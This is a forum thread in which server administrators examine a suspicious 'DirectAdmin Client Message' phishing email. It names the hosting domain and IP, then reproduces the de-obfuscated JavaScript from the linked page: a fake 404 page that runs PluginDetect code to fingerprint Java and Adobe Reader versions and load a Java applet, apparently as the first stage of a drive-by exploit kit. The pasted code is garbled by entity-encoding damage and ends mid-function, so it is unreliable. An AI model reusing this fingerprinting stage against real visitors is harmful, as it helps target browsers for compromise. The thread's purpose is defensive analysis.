"DirectAdmin Client Message" Email - Scam/Real?

I've never clicked but for all we know it could be somesort of key-logging stuff to get our DA details n such.
 
I think it is not the directadmin running on your server that has a vulnerability. It is probably the directadmin.com (216.194.67.119) server. But I do recommend you don't update directadmin, until there is more information about this issue.

yes, but since I'm running an older version of DA, it may have a vulnerability that can be exploited (now that bad guys knows my servers IPs)
 
I received two of these messages as well, I suppose since we own two licenses for DirectAdmin. This is a bit worrisome. I wonder how they got a hold of our names and email addresses?
 
This is what the javascript turns into:
-edit: see link in below post for the code-

If I had to guess it searches for old Java/PDF versions to exploit.
 
Last edited:
@aleto

Contact rather Panamaserver.com @ +507 832 2443, the URL you pointed is only an iframe that include the domain keinc0x.com hosted on 200.63.47.52.
 
Here's the code from Ariehs post tidied up to make it readable:

Code:
document.write('<center><h1>404 Not Found</h1></center><hr>');

function end_redirect() {}
var javafile = './games/getJavaInfo.jar';
var jver = [0, 0, 0, 0],
    pdfver = [0, 0, 0, 0];
try {
    var PluginDetect = {
        handler: function(c, b, a) {
            return function() {
                c(b, a)
            }
        },
        isDefined: function(b) {
            return typeof b != "undefined"
        },
        isArray: function(b) {
            return (/array/i).test(Object.prototype.toString.call(b))
        },
        isFunc: function(b) {
            return typeof b == "function"
        },
        isString: function(b) {
            return typeof b == "string"
        },
        isNum: function(b) {
            return typeof b == "number"
        },
        isStrNum: function(b) {
            return (typeof b == "string" & amp; & amp;
            (/\d/).test(b))
        },
        getNumRegx: /[\d][\d\.\_,-]*/,
        splitNumRegx: /[\.\_,-]/g,
        getNum: function(b, c) {
            var d = this,
                a = d.isStrNum(b) ? (d.isDefined(c) ? new RegExp(c) : d.getNumRegx).exec(b) : null;
            return a ? a[0] : null
        },
        compareNums: function(h, f, d) {
            var e = this,
                c, b, a, g = parseInt;
            if (e.isStrNum(h) & amp; & amp; e.isStrNum(f)) {
                if (e.isDefined(d) & amp; & amp; d.compareNums) {
                    return d.compareNums(h, f)
                }
                c = h.split(e.splitNumRegx);
                b = f.split(e.splitNumRegx);
                for (a = 0; a < math.min(c.length, b.length); a++) {
                    if (g(c[a], 10) > g(b[a], 10)) {
                        return 1
                    }
                    if (g(c[a], 10) < g(b[a], 10)) {
                        return -1
                    }
                }
            }
            return = ""
            0
        },
        formatnum: function(b, c) {
            var = ""
            d = "this,a,e;if(!d.isStrNum(b)){return"
            null
        }
        if (!d.isnum(c)) {
            c = "4}c--;e=b.replace(/\s/g,"").split(d.splitNumRegx).concat(["0","0","0","0"]);for(a=0;a<4;a++){if(/^(0+)(.+)$/.test(e[a])){e[a]=RegExp.$2}if(a" > c || !(/\d/).test(e[a])) {
            e[a] = "0"
        }
    }
    return e.slice(0, 4).join(",")
}, $$hasMimeType: function(a) {
    return function(d) {
        if (!a.isIE & amp; & amp; d) {
            var c, b, e, f = a.isString(d) ? [d] : d;
            if (!f || !f.length) {
                return null
            }
            for (e = 0; e < f.length; e++) {
                if ([ ^ \s] = "".test(f[e]) && (c = "navigator.mimeTypes[f[e]])&&(b=c.enabledPlugin)&&(b.name||b.description)){return"
                c
                }
                }
            }
            return = ""
            null
        }
    }, findnavplugin: function(l, e, c) {
        var = ""
        j = "this,h=new"
        regexp(l, "i"),
            d = "(!j.isDefined(e)||e)?/\d/:0,k=c?new"
            regexp(c, "i"): 0,
            a = "navigator.plugins,g="",f,b,m;for(f=0;f<a.length;f++){m=a[f].description||g;b=a[f].name||g;if((h.test(m)&&(!d||d.test(RegExp.leftContext+RegExp.rightContext)))||(h.test(b)&&(!d||d.test(RegExp.leftContext+RegExp.rightContext)))){if(!k||!(k.test(m)||k.test(b))){return"
            a[f]
    }
}
}
return = ""
null
},
getmimeenabledplugin: function(a, f) {
    var = ""
    e = "this,b,c=new"
    regexp(f, "i"),
        d = "";
    if ((b = "e.hasMimeType(a))&&(b=b.enabledPlugin)&&(c.test(b.description||d)||c.test(b.name||d))){return"
    b
    }
    return = ""
    0
    }, getpluginfileversion: function(f, b) {
        var = ""
        h = "this,e,d,g,a,c=-1;if(h.OS" > 2 || !f || !f.version || !(e = h.getNum(f.version))) {
        return b
    }
    if (!b) {
        return e
    }
    e = h.formatNum(e);b = h.formatNum(b);d = b.split(h.splitNumRegx);g = e.split(h.splitNumRegx);
    for (a = 0; a < d.length; a++) {
        if (c > -1 & amp; & amp; a & gt; c & amp; & amp; d[a] != "0") {
            return b
        }
        if (g[a] != d[a]) {
            if (c == -1) {
                c = a
            }
            if (d[a] != "0") {
                return b
            }
        }
    }
    return e
},
AXO: window.ActiveXObject,
getAXO: function(b) {
    var f = null,
        d, c = this,
        a;
    try {
        f = new c.AXO(b)
    } catch (d) {}
    return f
},
convertFuncs: function(g) {
    var a, h, f, b = /^[\$][\$]/,
        d = {},
        c = this;
    for (a in g) {
        if (b.test(a)) {
            d[a] = 1
        }
    }
    for (a in d) {
        try {
            h = a.slice(2);
            if (h.length & gt; 0 & amp; & amp; !g[h]) {
                g[h] = g[a](g);
                delete g[a]
            }
        } catch (f) {}
    }
},
initScript: function() {
    var c = this,
        a = navigator,
        e = "/",
        i = a.userAgent || "",
        g = a.vendor || "",
        b = a.platform || "",
        h = a.product || "";
    c.OS = 100;
    if (b) {
        var f, d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod", 21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\\s*PC", 22.3, "", 100];
        for (f = d.length - 2; f & gt; = 0; f = f - 2) {
            if (d[f] & amp; & amp; new RegExp(d[f], "i").test(b)) {
                c.OS = d[f + 1];
                break
            }
        }
    }
    c.convertFuncs(c);
    c.isIE = new Function("return " + e + "*@cc_on!@*" + e + "false")();
    c.verIE = c.isIE & amp; & amp;
    (/MSIE\s*(\d+\.?\d*)/i).test(i) ? parseFloat(RegExp.$1, 10) : null;
    c.ActiveXEnabled = false;
    if (c.isIE) {
        var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM", "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper", "Scripting.Dictionary", "wmplayer.ocx"];
        for (f = 0; f < j.length; f++) {
            if (c.getaxo(j[f])) {
                c.activexenabled = true;
                break
            }
        }
        c.head = c.isdefined(document.getelementsbytagname) ? document.getelementsbytagname("head")[0] : null
    }
    c.isgecko = (gecko = ""
    i).test(h) && ( = ""
    gecko\s * \ = ""\s * \d = ""
    i).test(i);
    c.vergecko = "c.isGecko?c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i)?RegExp.$1:"0.9"):null;c.isSafari=(/Safari\s*\/\s*\d/i).test(i)&&(/Apple/i).test(g);c.isChrome=(/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i);c.verChrome=c.isChrome?c.formatNum(RegExp.$1):null;c.isOpera=(/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i);c.verOpera=c.isOpera&&((/Version\s*\/\s*(\d+\.?\d*)/i).test(i)||1)?parseFloat(RegExp.$1,10):null;c.addWinEvent("load",c.handler(c.runWLfuncs,c))},init:function(c){var"
    b = "this,a,c;if(!b.isString(c)){return" - 3
}
if (c.length = "=1){b.getVersionDelimiter=c;return" - 3
}
c = "c.toLowerCase().replace(/\s/g,"");a=b[c];if(!a||!a.getVersion){return" - 3
}
b.plugin = "a;if(!b.isDefined(a.installed)){a.installed=a.version=a.version0=a.getVersionDone=null;a.$=b;a.pluginName=c}b.garbage=false;if(b.isIE&&!b.ActiveXEnabled){if(a!==b.java){return" - 2
}
}
return = ""
1
},
fpush: function(b, a) {
    var = ""
    c = "this;if(c.isArray(a)&&(c.isFunc(b)||(c.isArray(b)&&b.length" > 0 & amp; & amp;
    c.isFunc(b[0])))) {
    a.push(b)
}
},
callArray: function(b) {
    var c = this,
        a;
    if (c.isArray(b)) {
        for (a = 0; a < b.length; a++) {
            if (b[a] === null) {
                return
            }
            c.call(b[a]);
            b[a] = null
        }
    }
},
call: function(c) {
    var b = "this,a=b.isArray(c)?c.length:-1;if(a" > 0 & amp; & amp;
    b.isFunc(c[0])) {
    c[0](b, a & gt; 1 ? c[1] : 0, a & gt; 2 ? c[2] : 0, a & gt; 3 ? c[3] : 0)
} else {
    if (b.isFunc(c)) {
        c(b)
    }
}
},
getVersionDelimiter: ",",
$$getVersion: function(a) {
    return function(g, d, c) {
        var e = a.init(g),
            f, b, h;
        if (e & lt; 0) {
            return null
        };
        f = a.plugin;
        if (f.getVersionDone != 1) {
            f.getVersion(null, d, c);
            if (f.getVersionDone === null) {
                f.getVersionDone = 1
            }
        }
        a.cleanup();
        b = (f.version || f.version0);
        b = b ? b.replace(a.splitNumRegx, a.getVersionDelimiter) : b;
        return b
    }
},
cleanup: function() {
    var a = this;
    if (a.garbage & amp; & amp; a.isDefined(window.CollectGarbage)) {
        window.CollectGarbage()
    }
},
addWinEvent: function(d, c) {
    var e = this,
        a = window,
        b;
    if (e.isFunc(c)) {
        if (a.addEventListener) {
            a.addEventListener(d, c, false)
        } else {
            if (a.attachEvent) {
                a.attachEvent("on" + d, c)
            } else {
                b = a["on" + d];
                a["on" + d] = e.winHandler(c, b)
            }
        }
    }
},
winHandler: function(d, c) {
    return function() {
        d();
        if (typeof c == "function") {
            c()
        }
    }
},
WLfuncs0: [],
WLfuncs: [],
runWLfuncs: function(a) {
    a.winLoaded = true;
    a.callArray(a.WLfuncs0);
    a.callArray(a.WLfuncs);
    if (a.onDoneEmptyDiv) {
        a.onDoneEmptyDiv()
    }
},
winLoaded: false,
$$onWindowLoaded: function(a) {
    return function(b) {
        if (a.winLoaded) {
            a.call(b)
        } else {
            a.fPush(b, a.WLfuncs)
        }
    }
},
div: null,
divWidth: 50,
pluginSize: 1,
emptyDiv: function() {
    var c = this,
        a, e, b, d = 0;
    if (c.div & amp; & amp; c.div.childNodes) {
        for (a = c.div.childNodes.length - 1; a & gt; = 0; a--) {
            b = c.div.childNodes[a];
            if (b & amp; & amp; b.childNodes) {
                if (d == 0) {
                    for (e = b.childNodes.length - 1; e & gt; = 0; e--) {
                        b.removeChild(b.childNodes[e])
                    }
                    c.div.removeChild(b)
                } else {}
            }
        }
    }
},
DONEfuncs: [],
onDoneEmptyDiv: function() {
    var c = this,
        a, b;
    if (!c.winLoaded) {
        return
    }
    if (c.WLfuncs & amp; & amp; c.WLfuncs.length & amp; & amp; c.WLfuncs[c.WLfuncs.length - 1] !== null) {
        return
    }
    for (a in c) {
        b = c[a];
        if (b & amp; & amp; b.funcs) {
            if (b.OTF == 3) {
                return
            }
            if (b.funcs.length & amp; & amp; b.funcs[b.funcs.length - 1] !== null) {
                return
            }
        }
    }
    for (a = 0; a < c.donefuncs.length; a++) {
        c.callarray(c.donefuncs)
    }
    c.emptydiv()
},
getwidth: function(c) {
    if (c) {
        var a = "c.scrollWidth||c.offsetWidth,b=this;if(b.isNum(a)){return"
        a
    }
}
return = "" - 1
},
gettagstatus: function(m, g, a, b) {
    var = ""
    c = "this,f,k=m.span,l=c.getWidth(k),h=a.span,j=c.getWidth(h),d=g.span,i=c.getWidth(d);if(!k||!h||!d||!c.getDOMobj(m)){return" - 2
}
if (j < i || l < 0 || j < 0 || i < 0 || i <= "c.pluginSize||c.pluginSize<1){return"
0
}
if (l = "" >= i) {
    return -1
}
try {
    if (l == c.pluginSize & amp; & amp;
    (!c.isIE || c.getDOMobj(m).readyState == 4)) {
        if (!m.winLoaded & amp; & amp; c.winLoaded) {
            return 1
        }
        if (m.winLoaded & amp; & amp; c.isNum(b)) {
            if (!c.isNum(m.count)) {
                m.count = b
            }
            if (b - m.count & gt; = 10) {
                return 1
            }
        }
    }
} catch (f) {}
return 0
},
getDOMobj: function(g, a) {
    var f, d = this,
        c = g ? g.span : 0,
        b = c & amp; & amp;
    c.firstChild ? 1 : 0;
    try {
        if (b & amp; & amp; a) {
            c.firstChild.focus()
        }
    } catch (f) {}
    return b ? c.firstChild : null
},
setStyle: function(b, g) {
    var f = b.style,
        a, d, c = this;
    if (f & amp; & amp; g) {
        for (a = 0; a < g.length; a = a + 2) {
            try {
                f[g[a]] = g[a + 1]
            } catch (d) {}
        }
    }
},
insertdivinbody: function(i) {
    var g, d = "this,h="pd33993399",c=null,f=document,b="<",a=(f.getElementsByTagName("body")[0]||f.body);if(!a){try{f.write(b+'div"
    id = "'+h+'" > o '+b+"/div>");c=f.getElementById(h)}catch(g){}}a=(f.getElementsByTagName("body")[0]||f.body);if(a){if(a.firstChild&&d.isDefined(a.insertBefore)){a.insertBefore(i,a.firstChild)}else{a.appendChild(i)}if(c){a.removeChild(c)}}else{}},insertHTML:function(g,b,h,a,k){var l,m=document,j=this,q,o=m.createElement("span"),n,i,f="<";var c=["outlineStyle","none","borderStyle","none","padding","0px","margin","0px","visibility","visible"];if(!j.isDefined(a)){a=""}if(j.isString(g)&&(/[^\s]/).test(g)){q=f+g+'
    width = "'+j.pluginSize+'"
    height = "'+j.pluginSize+'"';for(n=0;n<b.length;n=n+2){if( [^\s]="" .test(b[n+1])){q+="b[n]+' = & quot;
    '+b[n+1]+' & quot;
    " '}}q+=" & gt;
    " ;for(n="
    0;
    n & lt;
    h.length;
    n = n + 2) {
    if (/[^\s]/.test(h[n + 1])) {
        q += f + 'param" name="' + h[n] + '" value="' + h[n + 1] + '">'
    }
}
q += a + f + "/" + g + ">"
} else {
    q = a
}
if (!j.div) {
    j.div = m.createElement("div");
    i = m.getElementById("plugindetect");
    if (i) {
        j.div = i
    } else {
        j.div.id = "plugindetect";
        j.insertDivInBody(j.div)
    }
    j.setStyle(j.div, c.concat(["width", j.divWidth + "px", "height", (j.pluginSize + 3) + "px", "fontSize", (j.pluginSize + 3) + "px", "lineHeight", (j.pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "block"]));
    if (!i) {
        j.setStyle(j.div, ["position", "absolute", "right", "0px", "top", "0px"])
    }
}
if (j.div & amp; & amp; j.div.parentNode) {
    j.div.appendChild(o);
    j.setStyle(o, c.concat(["fontSize", (j.pluginSize + 3) + "px", "lineHeight", (j.pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "inline"]));
    try {
        if (o & amp; & amp; o.parentNode) {
            o.focus()
        }
    } catch (l) {}
    try {
        o.innerHTML = q
    } catch (l) {}
    if (o.childNodes.length == 1 & amp; & amp; !(j.isGecko & amp; & amp; j.compareNums(j.verGecko, "1,5,0,0") & lt; 0)) {
        j.setStyle(o.firstChild, c.concat(["display", "inline"]))
    }
    return {
        span: o,
        winLoaded: j.winLoaded,
        tagName: (j.isString(g) ? g : "")
    }
}
return {
    span: null,
    winLoaded: j.winLoaded,
    tagName: ""
}
},
java: {
    mimeType: ["application/x-java-applet", "application/x-java-vm", "application/x-java-bean"],
    mimeTypeJPI: "application/x-java-applet;jpi-version=",
    classID: "clsid:8AD9C840-044E-11D1-B3E9-00805F499D93",
    DTKclassID: "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA",
    DTKmimeType: ["application/java-deployment-toolkit", "application/npruntime-scriptable-plugin;DeploymentToolkit"],
    forceVerifyTag: [],
    jar: [],
    Enabled: navigator.javaEnabled(),
    VENDORS: ["Sun Microsystems Inc.", "Apple Computer, Inc."],
    OTF: null,
    All_versions: [],
    mimeTypeJPIresult: "",
    JavaPlugin_versions: [],
    JavaVersions: [
        [1, 9, 2, 30],
        [1, 8, 2, 30],
        [1, 7, 2, 30],
        [1, 6, 1, 30],
        [1, 5, 1, 30],
        [1, 4, 2, 30],
        [1, 3, 1, 30]
    ],
    searchJavaPluginAXO: function() {
        var h = null,
            a = this,
            c = a.$,
            g = [],
            j = [1, 5, 0, 14],
            i = [1, 6, 0, 2],
            f = [1, 3, 1, 0],
            e = [1, 4, 2, 0],
            d = [1, 5, 0, 7],
            b = false;
        if (!c.ActiveXEnabled) {
            return null
        };
        if (c.verIE & gt; = a.minIEver) {
            g = a.searchJavaAXO(i, i, b);
            if (g.length & gt; 0 & amp; & amp; b) {
                g = a.searchJavaAXO(j, j, b)
            }
        } else {
            if (g.length == 0) {
                g = a.searchJavaAXO(f, e, false)
            }
        }
        if (g.length & gt; 0) {
            h = g[0]
        }
        a.JavaPlugin_versions = [].concat(g);
        return h
    },
    searchJavaAXO: function(l, i, m) {
        var n, f, h = this.$,
            q, k, a, e, g, j, b, r = [];
        if (h.compareNums(l.join(","), i.join(",")) & gt; 0) {
            i = l
        }
        i = h.formatNum(i.join(","));
        var o, d = "1,4,2,0",
            c = "JavaPlugin." + l[0] + "" + l[1] + "" + l[2] + "" + (l[3] & gt; 0 ? ("_" + (l[3] & lt; 10 ? "0" : "") + l[3]) : "");
        for (n = 0; n < this.javaversions.length; n++) {
            f = this.javaversions[n];
            q = "javaplugin." + f[0] + "" + f[1];
            g = f[0] + "." + f[1] + ".";
            for (a = f[2]; a >= 0; a--) {
                b = "JavaWebStart.isInstalled." + g + a + ".0";
                if (h.compareNums(f[0] + "," + f[1] + "," + a + ",0", i) & gt; = 0 & amp; & amp; !h.getAXO(b)) {
                    continue
                }
                o = h.compareNums(f[0] + "," + f[1] + "," + a + ",0", d) & lt;
                0 ? true : false;
                for (e = f[3]; e & gt; = 0; e--) {
                    k = a + "_" + (e & lt; 10 ? "0" + e : e);
                    j = q + k;
                    if (h.getAXO(j) & amp; & amp;
                    (o || h.getAXO(b))) {
                        r.push(g + k);
                        if (!m) {
                            return r
                        }
                    }
                    if (j == c) {
                        return r
                    }
                }
                if (h.getAXO(q + a) & amp; & amp;
                (o || h.getAXO(b))) {
                    r.push(g + a);
                    if (!m) {
                        return r
                    }
                }
                if (q + a == c) {
                    return r
                }
            }
        }
        return r
    },
    minIEver: 7,
    getMimeJPIversion: function() {
        var h, a = this,
            d = a.$,
            c = new RegExp("(" + a.mimeTypeJPI + ")(\\d.*)", "i"),
            k = new RegExp("Java", "i"),
            e, j, f = "",
            i = {},
            g = 0,
            b;
        for (h = 0; h < navigator.mimetypes.length; h++) {
            j = navigator.mimetypes[h];
            if (c.test(j.type) && (e = j.enabledplugin) && (j = regexp.$2) && (k.test(e.description || f) || k.test(e.name || f))) {
                i["a" + d.formatnum(j)] = j
            }
        }
        b = "0,0,0,0";
        for (h in = ""
        i) {
            g++;
            e = "h.slice(1);if(d.compareNums(e,b)" > 0) {
            b = e
        }
    }
    a.mimeTypeJPIresult = g & gt;0 ? a.mimeTypeJPI + i["a" + b] : "";
    return g & gt;0 ? b : null
},
getVersion: function(m, d, l) {
    var f, c = this,
        e = c.$,
        h = c.NOTF,
        b = c.applet,
        j = c.verify,
        i = vendor = versionEnabled = null;
    if (c.getVersionDone === null) {
        c.OTF = 0;
        c.mimeObj = e.hasMimeType(c.mimeType);
        c.deployTK.$ = e;
        c.deployTK.parentNode = c;
        b.$ = e;
        b.parentNode = c;
        if (h) {
            h.$ = e;
            h.parentNode = c
        }
        if (j) {
            j.parentNode = c;
            j.$ = e;
            j.init()
        }
    }
    var k;
    if (e.isArray(l)) {
        for (k = 0; k < b.allowed.length; k++) {
            if (e.isnum(l[k])) {
                b.allowed[k] = l[k]
            }
        }
    }
    for (k = 0; k < c.forceverifytag.length; k++) {
        b.allowed[k] = c.forceverifytag[k]
    }
    if (e.isstring(d)) {
        c.jar.push(d)
    }
    if (c.getversiondone == 0) {
        if (!c.version || b.cantryany()) {
            f = b.inserthtmlqueryall(d);
            if (f[0]) {
                c.installed = 1;
                c.endgetversion(f[0], f[1])
            }
        }
        return
    }
    var g = "c.deployTK.query();if(g.JRE){i=g.JRE;vendor=c.VENDORS[0]}if(!e.isIE){var"
    q,
        n, a, o;
    o = "(c.mimeObj&&c.Enabled)?true:false;if(!i&&(f=c.getMimeJPIversion())!==null){i=f}if(!i&&c.mimeObj){f="Java[^\\d]*Plug-in";a=e.findNavPlugin(f);if(a){f=new"
    regexp(f, "i");
    q = "f.test(a.description||"")?e.getNum(a.description):null;n=f.test(a.name||"")?e.getNum(a.name):null;if(q&&n){i=(e.compareNums(e.formatNum(q),e.formatNum(n))" >= 0) ? q : n
} else {
    i = q || n
}
}
}
if (!i & amp; & amp; c.mimeObj & amp; & amp; e.isSafari & amp; & amp; e.OS == 2) {
    a = e.findNavPlugin("Java.*\\d.*Plug-in.*Cocoa", 0);
    if (a) {
        q = e.getNum(a.description);
        if (q) {
            i = q
        }
    }
}
if (i) {
    c.version0 = i;
    if (c.Enabled) {
        versionEnabled = i
    }
}
} else {
    if (!i & amp; & amp; g.status == 0) {
        i = c.searchJavaPluginAXO();
        if (i) {
            vendor = c.VENDORS[0]
        }
    }
    if (i) {
        c.version0 = i;
        if (c.Enabled & amp; & amp; e.ActiveXEnabled) {
            versionEnabled = i
        }
    }
}
if (!versionEnabled || b.canTryAny()) {
    f = b.insertHTMLQueryAll(d);
    if (f[0]) {
        versionEnabled = f[0];
        vendor = f[1]
    }
}
if (!versionEnabled & amp; & amp;
(f = c.queryWithoutApplets())[0]) {
    c.version0 = versionEnabled = f[0];
    vendor = f[1];
    if (c.installed == -0.5) {
        c.installed = 0.5
    }
}
if (e.isSafari & amp; & amp; e.OS == 2) {
    if (!versionEnabled & amp; & amp; o) {
        if (c.installed === null) {
            c.installed = 0
        } else {
            if (c.installed == -0.5) {
                c.installed = 0.5
            }
        }
    }
}
if (c.jreDisabled()) {
    versionEnabled = null
};
if (c.installed === null) {
    c.installed = versionEnabled ? 1 : (i ? -0.2 : -1)
}
c.EndGetVersion(versionEnabled, vendor)
},
EndGetVersion: function(b, d) {
    var a = this,
        c = a.$;
    if (a.version0) {
        a.version0 = c.formatNum(c.getNum(a.version0))
    }
    if (b) {
        a.version = c.formatNum(c.getNum(b));
        a.vendor = (c.isString(d) ? d : "")
    }
    if (a.getVersionDone != 1) {
        a.getVersionDone = 0
    }
},
jreDisabled: function() {
    var b = this,
        d = b.$,
        c = b.deployTK.query().JRE,
        a;
    if (c & amp; & amp; d.OS == 1) {
        if ((d.isGecko & amp; & amp; d.compareNums(d.verGecko, "1,9,2,0") & gt; = 0 & amp; & amp; d.compareNums(c, "1,6,0,12") & lt; 0) || (d.isChrome & amp; & amp; d.compareNums(c, "1,6,0,12") & lt; 0)) {
            return 1
        }
    };
    if (d.isOpera & amp; & amp; d.verOpera & gt; = 9 & amp; & amp; !b.Enabled & amp; & amp; !b.mimeObj & amp; & amp; !b.queryWithoutApplets()[0]) {
        return 1
    }
    if ((d.isGecko || d.isChrome) & amp; & amp; !b.mimeObj & amp; & amp; !b.queryWithoutApplets()[0]) {
        return 1
    }
    return 0
},
deployTK: {
    status: null,
    JREall: [],
    JRE: null,
    HTML: null,
    query: function() {
        var f = this,
            h = f.$,
            c = f.parentNode,
            i, a, b, g = len = null;
        if (f.status !== null) {
            return f
        }
        f.status = 0;
        if ((h.isGecko & amp; & amp; h.compareNums(h.verGecko, h.formatNum("1.6")) & lt; = 0) || h.isSafari || h.isChrome || (h.isIE & amp; & amp; !h.ActiveXEnabled)) {
            return f
        }
        if (h.isIE & amp; & amp; h.verIE & gt; = 6) {
            f.HTML = h.insertHTML("object", [], []);
            g = h.getDOMobj(f.HTML)
        } else {
            if (!h.isIE & amp; & amp;
            (b = h.hasMimeType(c.DTKmimeType)) & amp; & amp; b.type) {
                f.HTML = h.insertHTML("object", ["type", b.type], []);
                g = h.getDOMobj(f.HTML)
            }
        }
        if (g) {
            if (h.isIE & amp; & amp; h.verIE & gt; = 6) {
                try {
                    g.classid = c.DTKclassID
                } catch (i) {}
            };
            try {
                var d = g.jvms;
                if (d) {
                    len = d.getLength();
                    if (h.isNum(len)) {
                        f.status = len & gt;
                        0 ? 1 : -1;
                        for (a = 0; a < len; a++) {
                            b = h.getnum(d.get(len - 1 - a).version);
                            if (b) {
                                f.jreall[a] = b
                            }
                        }
                    }
                }
            } catch (i) {}
        }
        if (f.jreall.length > 0) {
            f.JRE = h.formatNum(f.JREall[0])
        }
        return f
    }
},
queryWithoutApplets00: function(c, a) {
    var b = window.java,
        d;
    try {
        if (b & amp; & amp; b.lang & amp; & amp; b.lang.System) {
            a.value = [b.lang.System.getProperty("java.version") + " ", b.lang.System.getProperty("java.vendor") + " "]
        }
    } catch (d) {}
},
queryWithoutApplets: function() {
    var c = this,
        f = c.$,
        g, a = c.queryWithoutApplets;
    if (!a.value) {
        a.value = [null, null];
        if (!f.isIE & amp; & amp; window.java) {
            if (f.OS == 2 & amp; & amp; f.isOpera & amp; & amp; f.verOpera & lt; 9.2 & amp; & amp; f.verOpera & gt; = 9) {} else {
                if (f.isGecko & amp; & amp; f.compareNums(f.verGecko, "1,9,0,0") & lt; 0 & amp; & amp; f.compareNums(f.verGecko, "1,8,0,0") & gt; = 0) {} else {
                    if (f.isGecko) {
                        var i, b, h = document;
                        if (h.createElement & amp; & amp; h.createEvent) {
                            try {
                                i = h.createElement("div"), b = h.createEvent("HTMLEvents");
                                b.initEvent("change", false, false);
                                i.addEventListener("change", f.handler(c.queryWithoutApplets00, f, a), false);
                                i.dispatchEvent(b)
                            } catch (g) {}
                        }
                    } else {
                        c.queryWithoutApplets00(f, a)
                    }
                }
            }
        }
    }
    return a.value
},
applet: {
    results: [
        [null, null],
        [null, null],
        [null, null]
    ],
    HTML: [0, 0, 0],
    active: [0, 0, 0],
    allowed: [2, 2, 2],
    DummyObjTagHTML: 0,
    DummySpanTagHTML: 0,
    getResult: function() {
        var c = this.results,
            a, b;
        for (a = 0; a < c.length; a++) {
            b = c[a];
            if (b[0]) {
                break
            }
        }
        return [].concat(b)
    },
    cantry: function(d) {
        var b = "this,c=b.$,a=b.parentNode;if(b.allowed[d]==3){return"
        true
    }
    if (!a.version0 || !a.enabled || (c.isie && !c.activexenabled)) {
        if (b.allowed[d] = "=2){return"
        true
        }
        if (b.allowed[d] = "=1&&!b.getResult()[0]){return"
        true
        }
    }
    return = ""
    false
},
cantryany: function() {
    var = ""
    false
},
canuseapplettag: function() {
    var = ""
    a = "this,b=a.$;return(!b.isIE||b.ActiveXEnabled)},queryThis:function(h){var"
    g,
        c = "this,b=c.parentNode,f=b.$,a=vendor=null,d=f.getDOMobj(c.HTML[h],true);if(d){try{a=d.getVersion()+""";vendor="
        d.getVendor() + & quot;
    " ";
    d.statusbar(f.winloaded ? "="" " : "="" ")
} catch (g) {}
if (f.isstrnum(a)) {
    c.results[h] = "[a,vendor]}try{if(f.isIE&&a&&d.readyState!=4){f.garbage=true;d.parentNode.removeChild(d)}}catch(g){}}},insertHTMLQueryAll:function(e){var"
    g = "this,n=g.parentNode,d=n.$,o=g.results,q=g.HTML,h="    ",u="A.class";if(!d.isString(e)||!(/\.jar\s*$/).test(e)||(/\\/).test(e)){return[null,null]}if(n.OTF<1){n.OTF=1}if(n.jreDisabled()){return[null,null]}if(n.OTF<2){n.OTF=2}var"
    c = "e,t="",m;if((/[\/]/).test(e)){m=e.split("/");c=m[m.length-1];m[m.length-1]="";t=m.join("/")}var"
    j = "["archive",c,"code",u],l=["mayscript","true"],r=["scriptable","true"].concat(l),f=!d.isIE&&n.mimeObj&&n.mimeObj.type?n.mimeObj.type:n.mimeType[0];if(!q[0]&&g.canUseObjectTag()&&g.canTry(0)){q[0]=d.isIE?d.insertHTML("object",["type",f].concat(j),["codebase",t].concat(j).concat(r),h,n):d.insertHTML("object",["type",f,"archive",c,"classid","java:"+u],["codebase",t,"archive",c].concat(r),h,n);o[0]=[0,0];g.queryThis(0)}if(!q[1]&&g.canUseAppletTag()&&g.canTry(1)){q[1]=d.isIE?d.insertHTML("applet",["alt",h].concat(l).concat(j),["codebase",t].concat(l),h,n):d.insertHTML("applet",["codebase",t,"alt",h].concat(l).concat(j),[].concat(l),h,n);o[1]=[0,0];g.queryThis(1)}if(!q[2]&&g.canUseObjectTag()&&g.canTry(2)){q[2]=d.isIE?d.insertHTML("object",["classid",n.classID],["codebase",t].concat(j).concat(r),h,n):d.insertHTML();o[2]=[0,0];g.queryThis(2)}if(!g.DummyObjTagHTML&&g.canUseObjectTag()){g.DummyObjTagHTML=d.insertHTML("object",[],[],h)}if(!g.DummySpanTagHTML){g.DummySpanTagHTML=d.insertHTML("",[],[],h)};var"
    k, a = "0;for(k=0;k<o.length;k++){if(q[k]||g.canTry(k)){a++}else{break}}if(a==o.length){n.getVersionDone=n.forceVerifyTag.length" > 0 ? 0 : 1
}
return g.getResult()
}
},
append: function(e, d) {
    for (var c = 0; c < d.length; c++) {
        e.push(d[c])
    }
},
javafix: function() {}
},
adobereader: {
    mimetype: "application pdf",
    navpluginobj: null,
    progid: ["acropdf.pdf", "pdf.pdfctrl"],
    classid: "clsid:ca8a9780-280d-11cf-a24d-444553540000",
    installed: {},
    pluginhasmimetype: function(d, c, f) {
        var = ""
        b = "this,e=b.$,a;for(a" in = ""
        d) {
        if (d[a] && d[a].type && d[a].type = "=c){return"
        1
        }
    }
    if (e.getmimeenabledplugin(c, f)) {
        return = ""
        1
    }
    return = ""
    0
},
getversion: function(i, j) {
    var = ""
